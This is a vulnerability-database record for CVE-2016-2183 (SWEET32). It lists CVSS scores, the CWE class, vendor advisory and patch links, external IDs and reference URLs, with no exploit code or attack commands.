Trust: 0.1

nvd@nist.gov:	CVE-2016-2183
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.1
VULHUB:	VHN-91002
severity:	MEDIUM
baseScore:	5.0
vectorString:	AV:N/AC:L/AU:N/C:P/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	PARTIAL
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	2.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2016-2183
baseSeverity:	HIGH
baseScore:	7.5
vectorString:	CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	UNCHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	3.6
version:	3.1
Trust: 1.0

sources: VULHUB: VHN-91002 // VULMON: CVE-2016-2183 // NVD: CVE-2016-2183

PROBLEMTYPE DATA

problemtype:

CWE-200

Trust: 1.1

sources: VULHUB: VHN-91002 // NVD: CVE-2016-2183

THREAT TYPE

remote

Trust: 0.4

sources: PACKETSTORM: 138820 // PACKETSTORM: 150303 // PACKETSTORM: 143970 // PACKETSTORM: 141111

TYPE

overflow

Trust: 0.1

sources: PACKETSTORM: 142756

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-91002

PATCH

title:	Red Hat: Moderate: OpenShift Container Platform 4.5.13 openshift-enterprise-console-container security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20203842 - Security Advisory	Trust: 0.1
title:	Red Hat: Moderate: Red Hat Quay 3.0.2 security and bug fix update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20191245 - Security Advisory	Trust: 0.1
title:	Red Hat: Moderate: java-1.8.0-ibm security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170462 - Security Advisory	Trust: 0.1
title:	Red Hat: Moderate: python security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20182123 - Security Advisory	Trust: 0.1
title:	Red Hat: Moderate: OpenShift Container Platform 4.1.18 security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20192859 - Security Advisory	Trust: 0.1
title:	Red Hat: Moderate: OpenShift Container Platform 3.11 security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20200451 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Core Services security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20172708 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Core Services security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20172709 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Core Services security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20172710 - Security Advisory	Trust: 0.1
title:	IBM: Security Bulletin: IBM InfoSphere Information server is vulnerable to SWEET32 Birthday attack (CVE-2016-2183)	url:	https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=cce09482cb916969f209c63d0a7b2ddd	Trust: 0.1
title:	IBM: IBM Security Bulletin: Vulnerability in Python affects IBM OS Images for Red Hat Linux Systems	url:	https://vulmon.com/vendoradvisory?qidtp=ibm_psirt_blog&qid=7309727c470ac517c08efdea198e8b5c	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.18 security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20173240 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: OpenShift Container Platform 4.6.16 security and bug fix update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20210308 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Enterprise Application Platform 6.4.18 security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20173239 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Web Server security and bug fix update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20173113 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: Red Hat JBoss Web Server security and bug fix update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20173114 - Security Advisory	Trust: 0.1
title:	Ubuntu Security Notice: nss vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3270-1	Trust: 0.1
title:	Arch Linux Issues:	url:	https://vulmon.com/vendoradvisory?qidtp=arch_linux_issues&qid=CVE-2016-2183	Trust: 0.1
title:	Red Hat: CVE-2016-2183	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database&qid=CVE-2016-2183	Trust: 0.1
title:	Ubuntu Security Notice: nss vulnerability	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3372-1	Trust: 0.1
title:	Red Hat: Critical: java-1.6.0-ibm security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170338 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.7.0-ibm security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170337 - Security Advisory	Trust: 0.1
title:	Red Hat: Important: openssl security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20161940 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.6.0-sun security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170177 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.7.1-ibm security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170336 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.8.0-openjdk security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170180 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.7.0-openjdk security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170269 - Security Advisory	Trust: 0.1
title:	Red Hat: Critical: java-1.7.0-oracle security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170176 - Security Advisory	Trust: 0.1
title:	Symantec Security Advisories: SA133 : Sweet32 Birthday Attack against DES, 3DES, and Blowfish	url:	https://vulmon.com/vendoradvisory?qidtp=symantec_security_advisories&qid=cb3570c539f6d95e2afa1894711091f0	Trust: 0.1
title:	Red Hat: Critical: java-1.8.0-oracle security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20170175 - Security Advisory	Trust: 0.1
title:	Ubuntu Security Notice: openssl vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3087-1	Trust: 0.1
title:	Ubuntu Security Notice: openjdk-6 vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3198-1	Trust: 0.1
title:	Fortinet Security Advisories: Sweet32 Birthday attack in TLS	url:	https://vulmon.com/vendoradvisory?qidtp=fortinet_security_advisories&qid=FG-IR-17-173	Trust: 0.1
title:	Ubuntu Security Notice: openjdk-7 vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3194-1	Trust: 0.1
title:	Ubuntu Security Notice: openssl regression	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3087-2	Trust: 0.1
title:	Ubuntu Security Notice: openjdk-8 vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice&qid=USN-3179-1	Trust: 0.1
title:	Tenable Security Advisories: [R1] LCE 5.0.1 Fixes Two Third-party Library Vulnerabilities	url:	https://vulmon.com/vendoradvisory?qidtp=tenable_security_advisories&qid=TNS-2017-09	Trust: 0.1
title:	Red Hat: Moderate: java-1.7.1-ibm security update	url:	https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories&qid=RHSA-20171216 - Security Advisory	Trust: 0.1
title:	Arch Linux Advisories: [ASA-201609-24] lib32-openssl: multiple issues	url:	https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories&qid=ASA-201609-24	Trust: 0.1
title:	Arch Linux Advisories: [ASA-201609-23] openssl: multiple issues	url:	https://vulmon.com/vendoradvisory?qidtp=arch_linux_advisories&qid=ASA-201609-23	Trust: 0.1
title:	Amazon Linux AMI: ALAS-2016-755	url:	https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2016-755	Trust: 0.1
title:	Amazon Linux AMI: ALAS-2017-791	url:	https://vulmon.com/vendoradvisory?qidtp=amazon_linux_ami&qid=ALAS-2017-791	Trust: 0.1
title:	-	url:	https://github.com/Live-Hack-CVE/CVE-2016-2183	Trust: 0.1
title:	shadowsocks-perl	url:	https://github.com/zhou0/shadowsocks-perl	Trust: 0.1
title:	Cipher-TLS-removing-vulnerabilities-from-openvas	url:	https://github.com/jeffaizenbr/Cipher-TLS-removing-vulnerabilities-from-openvas	Trust: 0.1
title:	-	url:	https://github.com/aous-al-salek/crypto	Trust: 0.1
title:	lineBOT	url:	https://github.com/kampfcl3/lineBOT	Trust: 0.1

sources: VULMON: CVE-2016-2183

EXTERNAL IDS

db:	NVD	id:	CVE-2016-2183	Trust: 2.1
db:	PACKETSTORM	id:	142756	Trust: 1.2
db:	ICS CERT	id:	ICSMA-18-058-02	Trust: 1.1
db:	SECTRACK	id:	1036696	Trust: 1.1
db:	PULSESECURE	id:	SA40312	Trust: 1.1
db:	BID	id:	92630	Trust: 1.1
db:	BID	id:	95568	Trust: 1.1
db:	TENABLE	id:	TNS-2017-09	Trust: 1.1
db:	TENABLE	id:	TNS-2016-21	Trust: 1.1
db:	TENABLE	id:	TNS-2016-20	Trust: 1.1
db:	TENABLE	id:	TNS-2016-16	Trust: 1.1
db:	MCAFEE	id:	SB10197	Trust: 1.1
db:	MCAFEE	id:	SB10310	Trust: 1.1
db:	MCAFEE	id:	SB10186	Trust: 1.1
db:	MCAFEE	id:	SB10215	Trust: 1.1
db:	MCAFEE	id:	SB10171	Trust: 1.1
db:	SIEMENS	id:	SSA-412672	Trust: 1.1
db:	JUNIPER	id:	JSA10759	Trust: 1.1
db:	EXPLOIT-DB	id:	42091	Trust: 1.1
db:	PACKETSTORM	id:	143970	Trust: 0.2
db:	PACKETSTORM	id:	150303	Trust: 0.2
db:	PACKETSTORM	id:	141111	Trust: 0.2
db:	PACKETSTORM	id:	140725	Trust: 0.2
db:	PACKETSTORM	id:	144869	Trust: 0.2
db:	PACKETSTORM	id:	140084	Trust: 0.2
db:	PACKETSTORM	id:	152978	Trust: 0.2
db:	PACKETSTORM	id:	161320	Trust: 0.1
db:	PACKETSTORM	id:	148410	Trust: 0.1
db:	PACKETSTORM	id:	141352	Trust: 0.1
db:	PACKETSTORM	id:	140708	Trust: 0.1
db:	PACKETSTORM	id:	140718	Trust: 0.1
db:	PACKETSTORM	id:	143244	Trust: 0.1
db:	PACKETSTORM	id:	141100	Trust: 0.1
db:	PACKETSTORM	id:	140473	Trust: 0.1
db:	PACKETSTORM	id:	141354	Trust: 0.1
db:	PACKETSTORM	id:	144865	Trust: 0.1
db:	PACKETSTORM	id:	143549	Trust: 0.1
db:	PACKETSTORM	id:	141555	Trust: 0.1
db:	PACKETSTORM	id:	142340	Trust: 0.1
db:	PACKETSTORM	id:	145017	Trust: 0.1
db:	PACKETSTORM	id:	156451	Trust: 0.1
db:	PACKETSTORM	id:	147581	Trust: 0.1
db:	PACKETSTORM	id:	140977	Trust: 0.1
db:	PACKETSTORM	id:	154650	Trust: 0.1
db:	PACKETSTORM	id:	145018	Trust: 0.1
db:	PACKETSTORM	id:	141353	Trust: 0.1
db:	PACKETSTORM	id:	159431	Trust: 0.1
db:	CNNVD	id:	CNNVD-201608-448	Trust: 0.1
db:	VULHUB	id:	VHN-91002	Trust: 0.1
db:	VULMON	id:	CVE-2016-2183	Trust: 0.1
db:	PACKETSTORM	id:	138820	Trust: 0.1

sources: VULHUB: VHN-91002 // VULMON: CVE-2016-2183 // PACKETSTORM: 142756 // PACKETSTORM: 140084 // PACKETSTORM: 144869 // PACKETSTORM: 138820 // PACKETSTORM: 150303 // PACKETSTORM: 152978 // PACKETSTORM: 143970 // PACKETSTORM: 140725 // PACKETSTORM: 141111 // NVD: CVE-2016-2183

REFERENCES

url:	https://access.redhat.com/security/cve/cve-2016-2183	Trust: 1.3
url:	https://security.gentoo.org/glsa/201701-65	Trust: 1.2
url:	https://access.redhat.com/errata/rhsa-2017:3113	Trust: 1.2
url:	https://access.redhat.com/errata/rhsa-2019:1245	Trust: 1.2
url:	http://www.ubuntu.com/usn/usn-3087-1	Trust: 1.2
url:	http://www.ubuntu.com/usn/usn-3198-1	Trust: 1.2
url:	https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/km03286178	Trust: 1.2
url:	http://www.securitytracker.com/id/1036696	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/539885/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/539885/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/540129/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/540341/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/540341/100/0/threaded	Trust: 1.1
url:	http://seclists.org/fulldisclosure/2017/may/105	Trust: 1.1
url:	http://seclists.org/fulldisclosure/2017/jul/31	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/541104/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/541104/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/542005/100/0/threaded	Trust: 1.1
url:	http://www.securityfocus.com/archive/1/archive/1/542005/100/0/threaded	Trust: 1.1
url:	https://seclists.org/bugtraq/2018/nov/21	Trust: 1.1
url:	https://www.exploit-db.com/exploits/42091/	Trust: 1.1
url:	http://www.securityfocus.com/bid/92630	Trust: 1.1
url:	http://www.securityfocus.com/bid/95568	Trust: 1.1
url:	http://www.debian.org/security/2016/dsa-3673	Trust: 1.1
url:	https://security.gentoo.org/glsa/201612-16	Trust: 1.1
url:	https://security.gentoo.org/glsa/201707-01	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0336.html	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0337.html	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0338.html	Trust: 1.1
url:	http://rhn.redhat.com/errata/rhsa-2017-0462.html	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:1216	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:2708	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:2709	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:2710	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3114	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3239	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2017:3240	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2018:2123	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2019:2859	Trust: 1.1
url:	https://access.redhat.com/errata/rhsa-2020:0451	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00022.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00024.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00005.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00011.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00012.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00013.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-01/msg00068.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00023.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00028.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-05/msg00076.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00010.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-10/msg00011.html	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3087-2	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3179-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3194-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3270-1	Trust: 1.1
url:	http://www.ubuntu.com/usn/usn-3372-1	Trust: 1.1
url:	https://www.ietf.org/mail-archive/web/tls/current/msg04560.html	Trust: 1.1
url:	http://packetstormsecurity.com/files/142756/ibm-informix-dynamic-server-dll-injection-code-execution.html	Trust: 1.1
url:	http://www-01.ibm.com/support/docview.wss?uid=nas8n1021697	Trust: 1.1
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21991482	Trust: 1.1
url:	http://www-01.ibm.com/support/docview.wss?uid=swg21995039	Trust: 1.1
url:	http://www.huawei.com/en/psirt/security-advisories/huawei-sa-20170322-01-openssl-en	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2016-3090545.html	Trust: 1.1
url:	http://www.oracle.com/technetwork/topics/security/ovmbulletinoct2016-3090547.html	Trust: 1.1
url:	http://www.splunk.com/view/sp-caaapsv	Trust: 1.1
url:	http://www.splunk.com/view/sp-caaapue	Trust: 1.1
url:	https://access.redhat.com/articles/2548661	Trust: 1.1
url:	https://blog.cryptographyengineering.com/2016/08/24/attack-of-week-64-bit-ciphers-in-tls/	Trust: 1.1
url:	https://bto.bluecoat.com/security-advisory/sa133	Trust: 1.1
url:	https://bugzilla.redhat.com/show_bug.cgi?id=1369383	Trust: 1.1
url:	https://cert-portal.siemens.com/productcert/pdf/ssa-412672.pdf	Trust: 1.1
url:	https://github.com/ssllabs/ssllabs-scan/issues/387#issuecomment-242514633	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05302448	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05309984	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05323116	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05349499	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05356388	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05369403	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05369415	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05385680	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390722	Trust: 1.1
url:	https://h20566.www2.hpe.com/portal/site/hpsc/public/kb/docdisplay?docid=emr_na-c05390849	Trust: 1.1
url:	https://ics-cert.us-cert.gov/advisories/icsma-18-058-02	Trust: 1.1
url:	https://kb.pulsesecure.net/articles/pulse_security_advisories/sa40312	Trust: 1.1
url:	https://nakedsecurity.sophos.com/2016/08/25/anatomy-of-a-cryptographic-collision-the-sweet32-attack/	Trust: 1.1
url:	https://nodejs.org/en/blog/vulnerability/september-2016-security-releases/	Trust: 1.1
url:	https://security.netapp.com/advisory/ntap-20160915-0001/	Trust: 1.1
url:	https://security.netapp.com/advisory/ntap-20170119-0001/	Trust: 1.1
url:	https://softwaresupport.softwaregrp.com/document/-/facetsearch/document/km03158613	Trust: 1.1
url:	https://support.f5.com/csp/article/k13167034	Trust: 1.1
url:	https://sweet32.info/	Trust: 1.1
url:	https://wiki.opendaylight.org/view/security_advisories	Trust: 1.1
url:	https://www.arista.com/en/support/advisories-notices/security-advisories/1749-security-advisory-24	Trust: 1.1
url:	https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-17-0008	Trust: 1.1
url:	https://www.nccgroup.trust/us/about-us/newsroom-and-events/blog/2016/august/new-practical-attacks-on-64-bit-block-ciphers-3des-blowfish/	Trust: 1.1
url:	https://www.openssl.org/blog/blog/2016/08/24/sweet32/	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuapr2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpujan2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpujul2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuoct2020.html	Trust: 1.1
url:	https://www.oracle.com/security-alerts/cpuoct2021.html	Trust: 1.1
url:	https://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html	Trust: 1.1
url:	https://www.sigsac.org/ccs/ccs2016/accepted-papers/	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-16	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-20	Trust: 1.1
url:	https://www.tenable.com/security/tns-2016-21	Trust: 1.1
url:	https://www.tenable.com/security/tns-2017-09	Trust: 1.1
url:	https://www.teskalabs.com/blog/teskalabs-bulletin-160826-seacat-sweet32-issue	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00023.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-09/msg00031.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00021.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2016-10/msg00029.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00003.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2017-02/msg00032.html	Trust: 1.1
url:	http://lists.opensuse.org/opensuse-security-announce/2018-02/msg00032.html	Trust: 1.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390722	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10186	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05302448	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbgn03765en_us	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10197	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10310	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05385680	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10171	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbux03725en_us	Trust: 1.0
url:	https://www.vicarius.io/vsociety/posts/cve-2016-2183-detection-sweet32-vulnerability	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369415	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390849	Trust: 1.0
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369403	Trust: 1.0
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10215	Trust: 1.0
url:	https://www.vicarius.io/vsociety/posts/cve-2016-2183-mitigate-sweet32-vulnerability	Trust: 1.0
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10759	Trust: 1.0
url:	https://nvd.nist.gov/vuln/detail/cve-2016-2183	Trust: 0.9
url:	http://www.hpe.com/support/security_bulletin_archive	Trust: 0.2
url:	https://www.hpe.com/info/report-security-vulnerability	Trust: 0.2
url:	http://www.hpe.com/support/subscriber_choice	Trust: 0.2
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499	Trust: 0.2
url:	https://www.redhat.com/mailman/listinfo/rhsa-announce	Trust: 0.2
url:	https://bugzilla.redhat.com/):	Trust: 0.2
url:	https://access.redhat.com/articles/11258	Trust: 0.2
url:	https://access.redhat.com/security/team/contact/	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3253	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5546	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3261	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3241	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5552	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3252	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3272	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2016-5548	Trust: 0.2
url:	https://nvd.nist.gov/vuln/detail/cve-2017-3231	Trust: 0.2
url:	http://kb.juniper.net/infocenter/index?page=content&id=jsa10759	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05302448	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369403	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05369415	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05385680	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390722	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-c05390849	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbgn03765en_us	Trust: 0.1
url:	https://h20566.www2.hpe.com/hpsc/doc/public/display?doclocale=en_us&docid=emr_na-hpesbux03725en_us	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10171	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10186	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10197	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10215	Trust: 0.1
url:	https://kc.mcafee.com/corporate/index?page=content&id=sb10310	Trust: 0.1
url:	http://www.w3.org/2001/xmlschema-instance"	Trust: 0.1
url:	http://www.w3.org/2001/xmlschema"	Trust: 0.1
url:	http://schemas.xmlsoap.org/soap/envelope/"	Trust: 0.1
url:	http://schemas.xmlsoap.org/soap/encoding/">	Trust: 0.1
url:	http://win-pf2vmdt4mvo:8080/openadmin";#the	Trust: 0.1
url:	http://servername:port/location.	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-1092	Trust: 0.1
url:	http://www-01.ibm.com/support/docview.wss?uid=swg22002897	Trust: 0.1
url:	https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c05349499	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-9798	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-12617	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-9798	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-12615	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-12615	Trust: 0.1
url:	https://access.redhat.com/security/cve/cve-2017-9788	Trust: 0.1
url:	https://access.redhat.com/security/team/key/	Trust: 0.1
url:	https://access.redhat.com/articles/3227901	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-9788	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2017-12617	Trust: 0.1
url:	https://access.redhat.com/security/updates/classification/#important	Trust: 0.1
